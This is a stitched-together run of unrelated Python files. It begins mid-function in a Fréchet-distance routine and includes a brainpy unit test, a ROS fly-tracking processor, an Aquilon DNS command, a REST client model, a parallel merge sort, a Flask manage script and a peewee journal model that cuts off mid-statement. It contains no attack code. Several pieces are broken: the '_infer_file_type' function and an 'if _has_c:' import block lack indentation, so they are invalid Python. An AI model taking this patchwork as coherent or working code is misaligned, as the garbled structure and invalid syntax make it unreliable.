            raise ValueError(f'Imaginary component {m}')
        cov_sqrt = cov_sqrt.real
    mean_diff = mu1 - mu2
    mean_norm = mean_diff @ mean_diff
    trace = np.trace(sigma1) + np.trace(sigma2) - 2 * np.trace(cov_sqrt)
    fid = mean_norm + trace
    return fid
|
import unittest
from brainpy import IsotopicDistribution, isotopic_variants, calculate_mass, neutral_mass, _has_c, Peak
if _has_c:
from brainpy.brainpy import _IsotopicDistribution
class TestIsotopicDistribution(unittest.TestCase):
    """Check computed isotopic patterns for HexNAc against reference peaks."""

    def test_neutral_mass(self):
        hexnac = {'H': 13, 'C': 8, 'O': 5, 'N': 1}
        dist = isotopic_variants(hexnac)
        reference = [
            Peak(mz=203.079373, intensity=0.901867, charge=0),
            Peak(mz=204.082545, intensity=0.084396, charge=0),
            Peak(mz=205.084190, intensity=0.012787, charge=0),
            Peak(mz=206.086971, intensity=0.000950, charge=0)
        ]
        for observed, expected in zip(dist, reference):
            self.assertAlmostEqual(observed.mz, expected.mz, places=3)
            self.assertAlmostEqual(observed.intensity, expected.intensity, places=3)

    if _has_c:
        # Only defined when the C extension is importable.
        def test_pure_python(self):
            hexnac = {'H': 13, 'C': 8, 'O': 5, 'N': 1}
            dist = _IsotopicDistribution(hexnac, 4).aggregated_isotopic_variants()
            reference = [
                Peak(mz=203.079373, intensity=0.901867, charge=0),
                Peak(mz=204.082545, intensity=0.084396, charge=0),
                Peak(mz=205.084190, intensity=0.012787, charge=0),
                Peak(mz=206.086971, intensity=0.000950, charge=0)
            ]
            for observed, expected in zip(dist, reference):
                self.assertAlmostEqual(observed.mz, expected.mz, places=3)
                self.assertAlmostEqual(observed.intensity, expected.intensity, places=3)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
# remove() -> removes the first element found with the specified value.
lista_4 = [10,9,8,7,5,6,4,2,3,1,2,3]
print(lista_4)
# Only the first occurrence of 2 is removed; later duplicates remain.
lista_4.remove(2)
print(lista_4)
|
from django.contrib import admin
from .models import WhatsappChatMessages, WhatsappMediaMessages
# Expose the Whatsapp message models in the Django admin site.
admin.site.register(WhatsappChatMessages)
admin.site.register(WhatsappMediaMessages)
#!/usr/bin/python
from __future__ import print_function
import roslib; roslib.load_manifest('faa_data_processing')
import rospy
import argparse
import os
import numpy
import numpy.lib.recfunctions as recfunctions
import csv
from faa_utilities import FindData
from faa_utilities import FileTools
# Module-wide helper: supplies file-name prefixes, record dtypes and numpy
# loading used throughout the processing pipeline below.
FILE_TOOLS = FileTools()
class TrackingDataProcessor(object):
    """Post-processing pipeline for fly walkway/chamber tracking files.

    For each tracking file found, removes pre-trial rows, normalizes
    timestamps, filters out disabled tunnels, splits rows into walkway and
    chamber phases, and writes raw / analyzed / summarized CSV outputs
    alongside the original file.
    """
    def __init__(self,overwrite=False):
        # overwrite: when True, existing output files are regenerated.
        self.overwrite = overwrite
        self.fd = FindData(overwrite=overwrite)
    def find_and_process_data(self,directory):
        """Locate tracking files under *directory* and process each one."""
        paths = self.find_data(directory)
        self.process_data(paths)
    def find_data(self,directory):
        """Return tracking-data file paths below *directory* (via FindData)."""
        return self.fd.find_tracking_data(directory)
    def process_data(self,paths):
        """Run the full raw -> analyzed -> summarized pipeline per file."""
        for path in paths:
            print("Processing data in {0}".format(path))
            numpy_data = FILE_TOOLS.load_numpy_data(path)
            tracking_data = self.remove_pre_trial_data(numpy_data)
            # header: time_secs,time_nsecs,status,tunnel,enabled,gate0,gate1,gate2,fly_x,fly_y,fly_angle,chamber,blob_x,blob_y,blob_area,blob_slope,blob_ecc
            normalized_data = self.normalize_data(tracking_data)
            filtered_data = self.filter_data(normalized_data)
            raw_walkway_data = self.get_raw_walkway_data(filtered_data)
            raw_chamber_data = self.get_raw_chamber_data(filtered_data)
            self.write_data(path,FILE_TOOLS.raw_prefix+FILE_TOOLS.walkway_prefix,raw_walkway_data)
            self.write_data(path,FILE_TOOLS.raw_prefix+FILE_TOOLS.chamber_prefix,raw_chamber_data)
            analyzed_walkway_data = self.analyze_data(raw_walkway_data)
            self.write_data(path,FILE_TOOLS.analyzed_prefix+FILE_TOOLS.walkway_prefix,analyzed_walkway_data)
            summarized_walkway_data = self.summarize_data(analyzed_walkway_data)
            self.write_data(path,FILE_TOOLS.summarized_prefix+FILE_TOOLS.walkway_prefix,summarized_walkway_data)
            analyzed_chamber_data = self.analyze_chamber_data(raw_chamber_data)
            self.write_data(path,FILE_TOOLS.analyzed_prefix+FILE_TOOLS.chamber_prefix,analyzed_chamber_data)
            summarized_chamber_data = self.summarize_chamber_data(analyzed_chamber_data)
            self.write_data(path,FILE_TOOLS.summarized_prefix+FILE_TOOLS.chamber_prefix,summarized_chamber_data)
    def remove_pre_trial_data(self,tracking_data):
        """Drop rows recorded while the trial was still waiting to start."""
        indicies = tracking_data['status'] != 'Wait in Start'
        tracking_data = tracking_data[indicies]
        return tracking_data
    def normalize_data(self,tracking_data):
        """Append a 'time_rel' column: seconds elapsed since the first row."""
        time_secs = numpy.float64(tracking_data['time_secs'])
        time_secs -= time_secs[0]
        time_nsecs = numpy.float64(tracking_data['time_nsecs'])*10**(-9)
        time_nsecs -= time_nsecs[0]
        time_rel = time_secs + time_nsecs
        names = list(tracking_data.dtype.names)
        norm_data = tracking_data[names]
        norm_data = recfunctions.append_fields(norm_data,'time_rel',time_rel,dtypes=numpy.float64,usemask=False)
        # frame = numpy.uint32(tracking_data['frame'])
        # frame -= frame[0]
        # names = list(tracking_data.dtype.names)
        # names.remove('time_secs')
        # names.remove('time_nsecs')
        # names.remove('frame')
        # norm_data = tracking_data[names]
        # norm_data = recfunctions.append_fields(norm_data,'time',time,dtypes=numpy.float64,usemask=False)
        # norm_data = recfunctions.append_fields(norm_data,'frame',frame,dtypes=numpy.uint16,usemask=False)
        return norm_data
    def filter_data(self,normalized_data):
        """Keep rows of fully-enabled tunnels that have chamber/blob data.

        NOTE(review): if no tunnel has 'enabled' == 'True' for all of its
        rows, `indicies` stays None and the `&=` below raises TypeError —
        presumably that never happens on real data; verify.
        """
        tunnels = set(normalized_data['tunnel'])
        indicies = None
        for tunnel in tunnels:
            tunnel_data = normalized_data[normalized_data['tunnel']==tunnel]
            enabled = tunnel_data['enabled'] == 'True'
            # A tunnel is kept only if it was enabled for its entire run.
            if numpy.all(enabled):
                if indicies is not None:
                    indicies |= normalized_data['tunnel'] == tunnel
                else:
                    indicies = normalized_data['tunnel'] == tunnel
        indicies &= normalized_data['chamber'] != ''
        indicies &= normalized_data['blob_ecc'] != '0.0'
        filtered_data = normalized_data[indicies]
        return filtered_data
    def get_raw_walkway_data(self,filtered_data):
        """Extract walkway-phase rows as a walkway-dtype record array.

        Tunnel numbers are shifted from 0-based to 1-based for output.
        """
        # walkway_dtype = numpy.dtype([('time_secs', '<u4'),
        #                              ('time_nsecs', '<u4'),
        #                              ('time_rel', '<f4'),
        #                              ('tunnel', '<u2'),
        #                              ('fly_x', '<f4'),
        #                              ('fly_y', '<f4'),
        #                              ('fly_angle', '<f4'),
        #                              ])
        header = list(FILE_TOOLS.walkway_dtype.names)
        walkway_data = filtered_data[filtered_data['status'] == 'Walk To End']
        walkway_data = walkway_data[walkway_data['gate1'] != 'close']
        walkway_data = walkway_data[header]
        walkway_data = walkway_data.astype(FILE_TOOLS.walkway_dtype)
        walkway_data['tunnel'] = walkway_data['tunnel']+1
        return walkway_data
    def get_raw_chamber_data(self,filtered_data):
        """Extract chamber-phase rows, relabelled by odor period.

        'End Chamber Air' rows are split into 'AirBefore'/'AirAfter' around
        the first 'End Chamber Ethanol' timestamp; ethanol rows become
        'Ethanol'.  Tunnel numbers are shifted to 1-based.

        NOTE(review): assumes at least one ethanol row exists — the [0]
        below raises IndexError otherwise.
        """
        # chamber_dtype = numpy.dtype([('time_secs', '<u4'),
        #                              ('time_nsecs', '<u4'),
        #                              ('time_rel', '<f4'),
        #                              ('status', '|S25'),
        #                              ('tunnel', '<u2'),
        #                              ('fly_x', '<f4'),
        #                              ('fly_y', '<f4'),
        #                              ('fly_angle', '<f4'),
        #                              ])
        header = list(FILE_TOOLS.chamber_dtype.names)
        tracking_chamber_data = filtered_data[filtered_data['status'] != 'Walk To End']
        tracking_chamber_data = tracking_chamber_data[header]
        tracking_chamber_data = tracking_chamber_data.astype(FILE_TOOLS.chamber_dtype)
        tracking_chamber_data['tunnel'] = tracking_chamber_data['tunnel']+1
        indicies = tracking_chamber_data['status'] == 'End Chamber Ethanol'
        raw_chamber_data_ethanol = tracking_chamber_data[indicies]
        # Replace the status column wholesale with the period label.
        raw_chamber_data_ethanol = recfunctions.drop_fields(raw_chamber_data_ethanol,
                                                            'status',
                                                            usemask=False)
        status_array = numpy.array(['Ethanol']*len(raw_chamber_data_ethanol),dtype='|S25')
        raw_chamber_data_ethanol = recfunctions.append_fields(raw_chamber_data_ethanol,
                                                              'status',
                                                              status_array,
                                                              dtypes='|S25',
                                                              usemask=False)
        raw_chamber_data = raw_chamber_data_ethanol
        ethanol_start_time = raw_chamber_data_ethanol['time_rel'][0]
        indicies = tracking_chamber_data['status'] == 'End Chamber Air'
        indicies &= tracking_chamber_data['time_rel'] < ethanol_start_time
        raw_chamber_data_air_before = tracking_chamber_data[indicies]
        raw_chamber_data_air_before = recfunctions.drop_fields(raw_chamber_data_air_before,
                                                               'status',
                                                               usemask=False)
        status_array = numpy.array(['AirBefore']*len(raw_chamber_data_air_before),dtype='|S25')
        raw_chamber_data_air_before = recfunctions.append_fields(raw_chamber_data_air_before,
                                                                 'status',
                                                                 status_array,
                                                                 dtypes='|S25',
                                                                 usemask=False)
        raw_chamber_data = recfunctions.stack_arrays((raw_chamber_data_air_before,raw_chamber_data),usemask=False)
        indicies = tracking_chamber_data['status'] == 'End Chamber Air'
        indicies &= tracking_chamber_data['time_rel'] > ethanol_start_time
        raw_chamber_data_air_after = tracking_chamber_data[indicies]
        raw_chamber_data_air_after = recfunctions.drop_fields(raw_chamber_data_air_after,
                                                              'status',
                                                              usemask=False)
        status_array = numpy.array(['AirAfter']*len(raw_chamber_data_air_after),dtype='|S25')
        raw_chamber_data_air_after = recfunctions.append_fields(raw_chamber_data_air_after,
                                                                'status',
                                                                status_array,
                                                                dtypes='|S25',
                                                                usemask=False)
        raw_chamber_data = recfunctions.stack_arrays((raw_chamber_data,raw_chamber_data_air_after),usemask=False)
        return raw_chamber_data
    def write_data_to_file(self,path,data):
        """Write a record array to *path* as CSV with a header row."""
        header = list(data.dtype.names)
        fid = open(path, "w")
        data_writer = csv.writer(fid, delimiter=",")
        data_writer.writerow(header)
        data_writer.writerows(data)
        fid.close()
    def write_data(self,path,prefix,data):
        """Write *data* next to the tracking file *path*, swapping its prefix.

        Silently skips paths that are not tracking files, and skips existing
        outputs unless self.overwrite is set.
        """
        (dir,file) = os.path.split(path)
        if file.startswith(FILE_TOOLS.tracking_prefix):
            data_file = file.replace(FILE_TOOLS.tracking_prefix,prefix)
            data_path = os.path.join(dir,data_file)
            if os.path.exists(data_path) and not self.overwrite:
                print("Data file already exists!")
                return
        else:
            return
        print("Writing new data file")
        data_file_name = file.replace(FILE_TOOLS.tracking_prefix,prefix)
        data_path = os.path.join(dir,data_file_name)
        self.write_data_to_file(data_path,data)
    def analyze_data(self,raw_data):
        """Derive frame-to-frame kinematics per tunnel.

        Computes delta_time, displacement, distance, velocity, and angular
        velocity from consecutive rows of each tunnel.  Output has one row
        fewer per tunnel than the input (numpy.diff shortens by one).
        """
        initialized = False
        tunnels = set(raw_data['tunnel'])
        for tunnel in tunnels:
            tunnel_data_raw = raw_data[raw_data['tunnel']==tunnel]
            time_rel = tunnel_data_raw['time_rel']
            delta_time = numpy.diff(time_rel)
            tunnel_array = numpy.ones(len(delta_time),dtype=numpy.uint16)*tunnel
            tunnel_array.dtype = numpy.dtype([('tunnel','<u2')])
            tunnel_data_analyzed = tunnel_array
            fly_x = tunnel_data_raw['fly_x']
            delta_fly_x = numpy.diff(fly_x)
            fly_y = tunnel_data_raw['fly_y']
            delta_fly_y = numpy.diff(fly_y)
            distance = numpy.sqrt(numpy.square(delta_fly_x)+numpy.square(delta_fly_y))
            velocity = distance/delta_time
            fly_angle = tunnel_data_raw['fly_angle']
            delta_fly_angle = numpy.abs(numpy.diff(fly_angle))
            # Orientation is ambiguous by 180 degrees: use the smaller arc.
            flipped = 180 - delta_fly_angle
            flipped_is_less = flipped < delta_fly_angle
            delta_fly_angle[flipped_is_less] = flipped[flipped_is_less]
            angular_velocity = delta_fly_angle/delta_time
            time_secs = tunnel_data_raw['time_secs'][:-1]
            time_nsecs = tunnel_data_raw['time_nsecs'][:-1]
            names = ['time_secs','time_nsecs']
            tunnel_data_seq = [time_secs,time_nsecs]
            tunnel_data_analyzed = recfunctions.append_fields(tunnel_data_analyzed,
                                                              names,
                                                              tunnel_data_seq,
                                                              dtypes=numpy.uint64,
                                                              usemask=False)
            names = ['delta_time','delta_fly_x','delta_fly_y','distance','velocity','delta_fly_angle','angular_velocity']
            tunnel_data_seq = [delta_time,delta_fly_x,delta_fly_y,distance,velocity,delta_fly_angle,angular_velocity]
            tunnel_data_analyzed = recfunctions.append_fields(tunnel_data_analyzed,
                                                              names,
                                                              tunnel_data_seq,
                                                              dtypes=numpy.float32,
                                                              usemask=False)
            if initialized:
                analyzed_data = recfunctions.stack_arrays((analyzed_data,tunnel_data_analyzed),usemask=False)
            else:
                analyzed_data = tunnel_data_analyzed
                initialized = True
        return analyzed_data
    def analyze_chamber_data(self,raw_chamber_data):
        """Run analyze_data per odor period and re-tag rows with the period.

        Ethanol is always analyzed; AirBefore/AirAfter only when present.
        """
        ethanol_data = raw_chamber_data[raw_chamber_data['status']=='Ethanol']
        analyzed_ethanol_data = self.analyze_data(ethanol_data)
        status_array = numpy.array(['Ethanol']*len(analyzed_ethanol_data),dtype='|S25')
        analyzed_chamber_data = recfunctions.append_fields(analyzed_ethanol_data,
                                                           'status',
                                                           status_array,
                                                           dtypes='|S25',
                                                           usemask=False)
        air_before_data = raw_chamber_data[raw_chamber_data['status']=='AirBefore']
        if air_before_data.size != 0:
            analyzed_air_before_data = self.analyze_data(air_before_data)
            status_array = numpy.array(['AirBefore']*len(analyzed_air_before_data),dtype='|S25')
            analyzed_air_before_data = recfunctions.append_fields(analyzed_air_before_data,
                                                                  'status',
                                                                  status_array,
                                                                  dtypes='|S25',
                                                                  usemask=False)
            analyzed_chamber_data = recfunctions.stack_arrays((analyzed_air_before_data,analyzed_chamber_data),usemask=False)
        air_after_data = raw_chamber_data[raw_chamber_data['status']=='AirAfter']
        if air_after_data.size != 0:
            analyzed_air_after_data = self.analyze_data(air_after_data)
            status_array = numpy.array(['AirAfter']*len(analyzed_air_after_data),dtype='|S25')
            analyzed_air_after_data = recfunctions.append_fields(analyzed_air_after_data,
                                                                 'status',
                                                                 status_array,
                                                                 dtypes='|S25',
                                                                 usemask=False)
            analyzed_chamber_data = recfunctions.stack_arrays((analyzed_chamber_data,analyzed_air_after_data),usemask=False)
        return analyzed_chamber_data
    def summarize_data(self,analyzed_data):
        """Reduce analyzed rows to one summary row per tunnel.

        Summary fields: total_time, total_distance, mean_velocity,
        mean_angular_velocity.
        """
        initialized = False
        tunnels = set(analyzed_data['tunnel'])
        for tunnel in tunnels:
            tunnel_data_analyzed = analyzed_data[analyzed_data['tunnel']==tunnel]
            tunnel_array = numpy.ones(1,dtype=numpy.uint16)*tunnel
            tunnel_array.dtype = numpy.dtype([('tunnel','<u2')])
            tunnel_data_summarized = tunnel_array
            delta_time = tunnel_data_analyzed['delta_time']
            total_time = delta_time.sum()
            distance = tunnel_data_analyzed['distance']
            total_distance = distance.sum()
            velocity = tunnel_data_analyzed['velocity']
            mean_velocity = velocity.mean()
            angular_velocity = tunnel_data_analyzed['angular_velocity']
            mean_angular_velocity = angular_velocity.mean()
            names = ['total_time','total_distance','mean_velocity','mean_angular_velocity']
            tunnel_data_seq = [total_time,total_distance,mean_velocity,mean_angular_velocity]
            tunnel_data_summarized = recfunctions.append_fields(tunnel_data_summarized,
                                                                names,
                                                                tunnel_data_seq,
                                                                dtypes=numpy.float32,
                                                                usemask=False)
            if initialized:
                summarized_data = recfunctions.stack_arrays((summarized_data,tunnel_data_summarized),usemask=False)
            else:
                summarized_data = tunnel_data_summarized
                initialized = True
        return summarized_data
    def summarize_chamber_data(self,analyzed_chamber_data):
        """Summarize chamber data overall ('Total') and per odor period."""
        summarized_total_data = self.summarize_data(analyzed_chamber_data)
        status_array = numpy.array(['Total']*len(summarized_total_data),dtype='|S25')
        summarized_chamber_data = recfunctions.append_fields(summarized_total_data,
                                                             'status',
                                                             status_array,
                                                             dtypes='|S25',
                                                             usemask=False)
        air_before_data = analyzed_chamber_data[analyzed_chamber_data['status']=='AirBefore']
        if air_before_data.size != 0:
            summarized_air_before_data = self.summarize_data(air_before_data)
            status_array = numpy.array(['AirBefore']*len(summarized_air_before_data),dtype='|S25')
            summarized_air_before_data = recfunctions.append_fields(summarized_air_before_data,
                                                                    'status',
                                                                    status_array,
                                                                    dtypes='|S25',
                                                                    usemask=False)
            summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_air_before_data),usemask=False)
        ethanol_data = analyzed_chamber_data[analyzed_chamber_data['status']=='Ethanol']
        summarized_ethanol_data = self.summarize_data(ethanol_data)
        status_array = numpy.array(['Ethanol']*len(summarized_ethanol_data),dtype='|S25')
        summarized_ethanol_data = recfunctions.append_fields(summarized_ethanol_data,
                                                             'status',
                                                             status_array,
                                                             dtypes='|S25',
                                                             usemask=False)
        summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_ethanol_data),usemask=False)
        air_after_data = analyzed_chamber_data[analyzed_chamber_data['status']=='AirAfter']
        if air_after_data.size != 0:
            summarized_air_after_data = self.summarize_data(air_after_data)
            status_array = numpy.array(['AirAfter']*len(summarized_air_after_data),dtype='|S25')
            summarized_air_after_data = recfunctions.append_fields(summarized_air_after_data,
                                                                   'status',
                                                                   status_array,
                                                                   dtypes='|S25',
                                                                   usemask=False)
            summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_air_after_data),usemask=False)
        return summarized_chamber_data
# Command-line entry point: process all tracking files under a directory.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("directory", help="Directory where tracking files are located")
    parser.add_argument("-o", "--overwrite", dest='overwrite', default=False, action="store_true", help="Reanalyze all experiments and overwrite previous data (default is to only analyze new data)")
    args = parser.parse_args()
    tdp = TrackingDataProcessor(args.overwrite)
    tdp.find_and_process_data(args.directory)
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aquilon.aqdb.model import NsRecord, DnsDomain, ARecord
from aquilon.worker.broker import BrokerCommand
from aquilon.exceptions_ import NotFoundException
class CommandShowNsRecord(BrokerCommand):

    required_parameters = ["dns_domain", "fqdn"]

    def render(self, session, dns_domain, **kw):
        """Return the NS records of *dns_domain* that point at the A record
        named by the 'fqdn' parameter, or raise NotFoundException."""
        # Both lookups use compel=True, so a missing domain or A record
        # raises before the NS query runs (domain is checked first).
        dbdns_domain = DnsDomain.get_unique(session, dns_domain, compel=True)
        dba_record = ARecord.get_unique(session, fqdn=kw['fqdn'], compel=True)
        query = (session.query(NsRecord)
                 .filter_by(dns_domain=dbdns_domain)
                 .filter_by(a_record=dba_record))
        records = query.all()
        if not records:
            raise NotFoundException(
                "Could not find a dns_record for domain '%s'." % dns_domain)
        return records
|
# NOTE: this module is Python 2 code (print statements below).
class Model(object):
    '''
    Base class for REST resources backed by a raw JSON document.

    Subclasses must specify id_field and base_uri as class variables.
    '''
    id_field = None
    base_uri = None
    def __init__(self, raw_json, client):
        # raw_json: the resource's JSON document (dict-like).
        # client: HTTP client providing get/post/download.
        if not self.__class__.id_field:
            raise ValueError('Cannot construct Model subclass without id_field set')
        if not self.__class__.base_uri:
            raise ValueError('Cannot construct Model subclass without base_uri set')
        self.raw_json = raw_json
        self.client = client
        self.download_path = None
    def __repr__(self):
        return '<{} {}>'.format(self.__class__.__name__, self._id)
    @property
    def _id(self):
        # The resource identifier, read from the subclass-defined id_field.
        return self.raw_json.get(self.id_field)
    @property
    def metadata_uri(self):
        return '{}/{}'.format(self.base_uri, self._id)
    @property
    def download_uri(self):
        return '{}/download'.format(self.metadata_uri)
    @property
    def status(self):
        # Server-side processing state: e.g. 'pending', 'ready', 'failed'.
        return self.raw_json.get('status')
    def create(self):
        '''
        Create (POST) a record of this resource.
        '''
        self.raw_json = self.client.post(self.base_uri, self.raw_json)
        return self
    def refresh(self, **kwargs):
        '''
        Refresh (GET) the resource's metadata.
        '''
        self.raw_json = self.client.get(self.metadata_uri, **kwargs)
        return self
    @classmethod
    def find_by_id(cls, doc_id, client):
        # Build a stub with only the id set, then fetch the full document.
        stub = cls({cls.id_field: doc_id}, client)
        return stub.refresh()
    def refresh_until_ready(self, polling_interval=10, timeout=1200):
        '''
        Poll the resource until its status becomes 'ready'.

        Raises ProcessingFailed if the status becomes 'failed', and the
        TimeoutTimer aborts after *timeout* seconds.
        '''
        # Timeout for 20 min because kinect/realsense are almost that slow
        import time
        from harrison.timer import TimeoutTimer
        from bodylabs_api.exceptions import ProcessingFailed
        # The first refresh will log a message if self.client.verbose
        self.refresh()
        with TimeoutTimer(
                desc='Polling {}'.format(self),
                verbose=self.client.verbose,
                timeout=timeout):
            while self.status != 'ready':
                self.refresh(verbose=False)  # no log, just the dot below
                if self.status == 'pending':
                    if self.client.verbose:
                        print '.',
                    time.sleep(polling_interval)
                elif self.status == 'failed':
                    raise ProcessingFailed('Artifact {} failed'.format(self))
        if self.client.verbose:
            print '{} is ready'.format(self)
        return self
    def download(self, output_path, blocking=True, **kwargs):
        # When blocking, wait for the resource to finish processing first;
        # kwargs are forwarded to refresh_until_ready.
        if blocking:
            self.refresh_until_ready(**kwargs)
        self.client.download(self.download_uri, output_path)
        self.download_path = output_path
        return self
class Artifact(Model):
    """A processing-artifact resource, keyed by ``artifactId``."""
    id_field = 'artifactId'
    base_uri = '/artifacts'
    def _meta(self, key):
        # Every public accessor below is a thin read of the raw JSON payload.
        return self.raw_json.get(key)
    @property
    def artifact_id(self):
        """Alias for the generic resource id."""
        return self._id
    @property
    def service_type(self):
        return self._meta('serviceType')
    @property
    def artifact_type(self):
        return self._meta('artifactType')
    @property
    def service_version(self):
        return self._meta('serviceVersion')
    @property
    def parameters(self):
        return self._meta('parameters')
    @property
    def dependencies(self):
        return self._meta('dependencies')
class MultiComponentArtifact(Artifact):
    """Artifact made of several named components, each downloaded separately."""
    def __init__(self, raw_json, client):
        # Bug fix: the original called super(self.__class__, self), which
        # resolves to MultiComponentArtifact even from a subclass's __init__
        # and therefore recurses forever as soon as this class is subclassed.
        super(MultiComponentArtifact, self).__init__(raw_json, client)
        # component name -> local path, filled in by download_component()
        self.downloaded_components = {}
    @property
    def download_uri(self):
        """There is no single payload; use download_component() instead."""
        raise NotImplementedError(
            '{} has no single download_uri; use download_component instead'.format(self.__class__.__name__))
    @property
    def components(self):
        """Component names reported by the server ([] until known)."""
        return self.raw_json.get('components', [])
    def get_component_uri(self, component, validate=False):
        """Build the download URI for *component*; with validate=True,
        refresh and raise ValueError when the server does not list it."""
        uri = '{}/components/{}'.format(self.metadata_uri, component)
        if validate:
            if component not in self.refresh().components:
                raise ValueError('{} has no component {}'.format(self, component))
        return uri
    def download_component(self, component, output_path, blocking=True, **kwargs):
        """Download one component to *output_path*, optionally polling until
        the artifact is ready (kwargs go to refresh_until_ready)."""
        component_uri = self.get_component_uri(component, validate=True)  # fail early
        if blocking:
            self.refresh_until_ready(**kwargs)
        self.client.download(component_uri, output_path)
        self.downloaded_components[component] = output_path
        return self
def _infer_file_type(filepath):
from os.path import splitext
_, ext = splitext(filepath)
if not ext:
raise ValueError('Cannot infer file_type for path {} with no extension'.format(filepath))
return ext[1:] # drop leading dot
class File(Model):
    """An uploadable file resource, keyed by ``fileId``.

    Lifecycle: create() -> upload() -> finalize(); from_local_path() runs
    the whole workflow in one call.
    """
    id_field = 'fileId'
    base_uri = '/files'
    @property
    def file_id(self):
        """The server-assigned file identifier."""
        return self._id
    @property
    def file_type(self):
        """Declared file type for this file."""
        return self.raw_json.get('fileType')
    @property
    def signed_upload_url(self):
        """Only exists between file.create and file.finalize calls; otherwise None"""
        return self.raw_json.get('signedUploadUrl')
    @property
    def s3_version_id(self):
        """Only exists between file.upload and file.finalize calls; otherwise None"""
        return self.raw_json.get('s3VersionId')
    def upload(self, path):
        """Upload path to self.signed_upload_url and populate self.s3_version_id"""
        upload_url = self.signed_upload_url
        if upload_url is None:
            raise ValueError('Can\'t upload without signed_upload_url from create')
        upload_result = self.client.upload(upload_url, path)
        self.raw_json['s3VersionId'] = upload_result['s3VersionId']
        return self
    def finalize(self):
        """Finalize (PATCH) File and clear self.signed_upload_url and
        self.s3_version_id"""
        version = self.s3_version_id
        if version is None:
            raise ValueError('Can\'t finalize without s3_version_id from upload')
        self.raw_json = self.client.patch(self.metadata_uri, {'s3VersionId': version})
        return self
    @classmethod
    def from_local_path(cls, path, client, file_type=None):
        """Factory method encapsulating the whole create/upload/finalize workflow"""
        file_type = file_type or _infer_file_type(path)
        return cls({'fileType': file_type}, client).create().upload(path).finalize()
|
import multiprocessing
from .recursive_merge_sort import copy_merge as merge
from .recursive_merge_sort import recursive_merge_sort as merge_sort
def parallel_merge_sort(vector, count_slice=0, self_id=1, return_dict=None):
    """Merge sort parallelised across processes.

    The work is split over cpu_count() slices; each recursive call owns a
    slot (self_id) in a Manager dict shared with its children, using the
    heap-style numbering left=2*i, right=2*i+1.

    :param vector: list to sort
    :param count_slice: process slices still available to this call
    :param self_id: this call's slot in return_dict
    :param return_dict: shared dict; created on the top-level call
    :return: the sorted list
    """
    if return_dict is None:  # fixed: identity check instead of '== None'
        # Top-level call: create the shared state and fan out over all cores.
        manager = multiprocessing.Manager()
        return_dict = manager.dict()
        count_slice = multiprocessing.cpu_count()
        self_id = 1
    return_dict[self_id] = vector
    if count_slice >= 2:
        # Sort the right half in a child process, the left half in-process.
        right_side_p = multiprocessing.Process(
            target=parallel_merge_sort,
            args=(
                return_dict[self_id][len(return_dict[self_id])//2:],
                count_slice-(count_slice//2),
                (self_id*2)+1,
                return_dict
            )
        )
        right_side_p.start()
        left_side = parallel_merge_sort(return_dict[self_id][:len(return_dict[self_id])//2], (count_slice//2), self_id*2, return_dict)
        right_side_p.join()
        return_dict[self_id] = merge(return_dict[self_id*2], return_dict[self_id*2+1])
    else:
        # No budget left for another process: fall back to the serial sort.
        return_dict[self_id] = merge_sort(vector)
    return return_dict[self_id]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
if os.path.exists('.env'):
    # Load KEY=VALUE pairs from .env into the environment before the app
    # configuration (imported below) reads it.
    with open('.env') as env_file:  # the original leaked the file handle
        for line in env_file:
            # Split on the first '=' only, so values may themselves
            # contain '=' (the original skipped such lines entirely).
            key, sep, value = line.strip().partition('=')
            if sep and key:
                os.environ[key] = value
from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
# Build the Flask app from the FLASK_CONFIG environment variable (falling
# back to the 'default' configuration) and wire up the CLI manager.
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
mc = MigrateCommand
# 'db' exposes the Flask-Migrate commands; 'mp' adds the project-specific
# mercadopublico commands.
manager.add_command('db', mc)
from manage_mercadopublico import MPCommand
manager.add_command('mp', MPCommand)
# from manage_test import TestCommand
# manager.add_command('test', TestCommand)
@mc.command
def drop_all(reflect=False):
    """
    Custom drop_all

    With reflect=True, first load tables that exist in the database but are
    not declared as models, so they are dropped as well.
    """
    if reflect:
        db.reflect()
    db.drop_all()
@mc.command
def create_all():
    """
    Create all from sqlalchemy db

    Creates every table declared on the SQLAlchemy metadata.
    """
    db.create_all()
# Entry point: delegate to Flask-Script's CLI dispatcher.
if __name__ == '__main__':
    manager.run()
|
# Return the number of open edges on a sphere (a closed surface has none).
#
import pyvista
sphere = pyvista.Sphere()
sphere.n_open_edges
# Expected:
## 0
#
# Return the number of open edges on a plane (a single-cell plane's
# boundary contributes four open edges).
#
plane = pyvista.Plane(i_resolution=1, j_resolution=1)
plane.n_open_edges
# Expected:
## 4
|
import datetime
from flask.ext.bcrypt import generate_password_hash
from flask.ext.login import UserMixin
from peewee import *
# Single SQLite database shared by all models below.
DATABASE = SqliteDatabase('journal.db')
class User(UserMixin, Model):
    """Journal account; doubles as the Flask-Login user object."""
    username = CharField(unique=True)
    email = CharField(unique=True)
    password = CharField(max_length=100)  # bcrypt hash, never plaintext
    join_date = DateTimeField(default=datetime.datetime.now)
    is_admin = BooleanField(default=False)
    class Meta:
        # Peewee configuration: backing database and default ordering
        # (newest members first).
        database = DATABASE
        order_by = ('-join_date',)
    def get_posts(self):
        """Return a query over this user's own posts."""
        return Post.select().where(Post.user == self)
    def get_stream(self):
        """Return the post stream for this user (currently only own posts)."""
        return Post.select().where(
            (Post.user == self)
        )
    @classmethod
    def create_user(cls, username, email, password, admin=False):
        """Create a user with a hashed password.

        Raises ValueError when the unique username/email constraint fails.
        """
        try:
            with DATABASE.transaction():
                cls.create(
                    username=username,
                    email=email,
                    password=generate_password_hash(password),
